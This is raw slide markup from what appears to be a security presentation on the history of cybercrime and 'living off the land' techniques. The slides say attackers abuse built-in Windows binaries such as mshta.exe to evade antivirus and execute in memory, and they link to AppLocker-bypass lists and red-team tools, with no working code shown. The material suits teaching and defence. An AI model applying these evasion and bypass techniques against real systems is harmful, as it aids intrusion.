    <p:sldLayoutId id="2147483691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attack.mitre.org/wiki/Execution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hub.com/redcanaryco/atomic-red-team/tree/master/Window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st.github.com/trustedsec/686057a1b8cdf3e580c57b211b263abe" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/api0cradle/UltimateAppLockerByPassList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hyperlink" Target="https://github.com/ALBY-Project/ALBY" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GreatSCT/GreatSCT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hyperlink" Target="https://oddvar.moe/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/api0cradle/UltimateAppLockerByPassLis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914400"/>
          </a:xfrm>
        </p:spPr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987624"/>
            <a:ext cx="8229600" cy="2663825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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6" name="Manuell innmating 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{050331DC-0281-40A2-8E4D-C457D00E616E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2931790"/>
            <a:ext cx="1296144" cy="1008112"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartManualInpu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/>
              <a:t>Trojans, Advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>worms</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Manuell innmating 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE4FCD73-2A27-4944-9BD3-77E946FCAD5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="2643337"/>
            <a:ext cx="1152128" cy="1296565"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartManualInpu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Identity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1"/>
              <a:t>theft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1"/>
              <a:t>Phishing</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Manuell innmating 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7F5D19B-719A-484D-A0A6-3CD27F0840AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706466" y="2319536"/>
            <a:ext cx="1440160" cy="1620366"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartManualInpu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/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Botnets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>competative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>sabotage</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Snakkeboble: rektangel med avrundede hjørner 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A858695-7185-4F21-B0FA-1506412C95D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127992" y="2258591"/>
            <a:ext cx="874440" cy="626318"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32863"/>
              <a:gd name="adj2" fmla="val 85756"/>
              <a:gd name="adj3" fmla="val 16667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1997</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Snakkeboble: rektangel med avrundede hjørner 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E256480-D01F-4128-B56A-DBA0131503E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393304" y="2017440"/>
            <a:ext cx="874440" cy="626318"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32863"/>
              <a:gd name="adj2" fmla="val 85756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2004</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Snakkeboble: rektangel med avrundede hjørner 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A09DB4-C4EB-4B02-B365-C72239BE9341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555776" y="1779662"/>
            <a:ext cx="874440" cy="626318"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32863"/>
              <a:gd name="adj2" fmla="val 85756"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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2007</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Manuell innmating 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056C9255-AEE7-43DC-A2F3-D35CD2AA9095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4146626" y="1923678"/>
            <a:ext cx="1452576" cy="2016224"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartManualInp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 err="1"/>
              <a:t>Social</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>PoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Snakkeboble: rektangel med avrundede hjørner 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C4DD35-DF75-47C4-BBF0-B21F91550143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977513" y="1448458"/>
            <a:ext cx="874440" cy="626318"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32863"/>
              <a:gd name="adj2" fmla="val 85756"/>
              <a:gd name="adj3" fmla="val 16667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2010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Manuell innmating 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4B0E8AD-F8A3-4C0C-AC86-933F367C5268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580112" y="1419622"/>
            <a:ext cx="2232248" cy="2520280"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartManualInpu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/>
              <a:t>Banking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Bitcoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>wallet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>theft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>phone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>PoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Warfare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, smart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>phone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Cars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Election</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>fraud</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Snakkeboble: rektangel med avrundede hjørner 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31DD4EDD-A48E-469C-876B-41476ECEF7E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410999" y="1081336"/>
            <a:ext cx="874440" cy="626318"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32863"/>
              <a:gd name="adj2" fmla="val 85756"/>
              <a:gd name="adj3" fmla="val 16667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2013</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Snakkeboble: rektangel med avrundede hjørner 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB70C5A-E439-4BF8-B0A9-2C10DD11AD41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585992" y="555526"/>
            <a:ext cx="1234480" cy="626318"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -32863"/>
              <a:gd name="adj2" fmla="val 85756"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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Present</a:t>
            </a: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54CE9C1A-757E-4A6B-AEB2-F14B9797A29A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-108520" y="4932735"/>
            <a:ext cx="581216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900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://resources.infosecinstitute.com/evolution-in-the-world-of-cyber-crime/#gref</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376659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6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1" dur="20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00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2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10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1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47297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«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Living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off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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> land»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059582"/>
            <a:ext cx="8229600" cy="3312368"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pre 2013 – Most used by Advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>groups</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>More and more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Binaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in Windows </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evasion</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blend in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Asdjksadkjek.exe or mshta.exe</a:t>
            </a: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0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D2920D8-2A39-44EB-AF6F-F63742AEA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455842"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259632" y="142254"/>
          <a:ext cx="7344816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ktangel 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5782E441-ED93-4C32-81AF-9A92A308B94F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="142254"/>
            <a:ext cx="3096344" cy="773312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63168591-0083-4914-8BAC-1715ECA62878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1655272" y="1150366"/>
            <a:ext cx="3096344" cy="773312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60025F83-0803-4B82-A215-C3E5D71E303D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1655272" y="2203870"/>
            <a:ext cx="3096344" cy="773312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B40CE67D-6354-42A2-B19F-26F128CDC9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1650875" y="3234678"/>
            <a:ext cx="3096344" cy="773312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B25AA26A-E8E1-4EF6-8067-1532A16A793C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="4242790"/>
            <a:ext cx="3096344" cy="773312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EBD31282-09B6-447F-A7B9-FCF1E3E8C21C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5112060" y="142254"/>
            <a:ext cx="3096344" cy="773312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CAD8FC9E-9BF8-49F4-BB0E-EC07DC513E50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5112060" y="1174065"/>
            <a:ext cx="3096344" cy="773312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3702B674-A8F7-4775-9C36-ACA2B78F6F01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148064" y="2203870"/>
            <a:ext cx="3096344" cy="773312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500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2474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How to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Windows </a:t>
            </a:r>
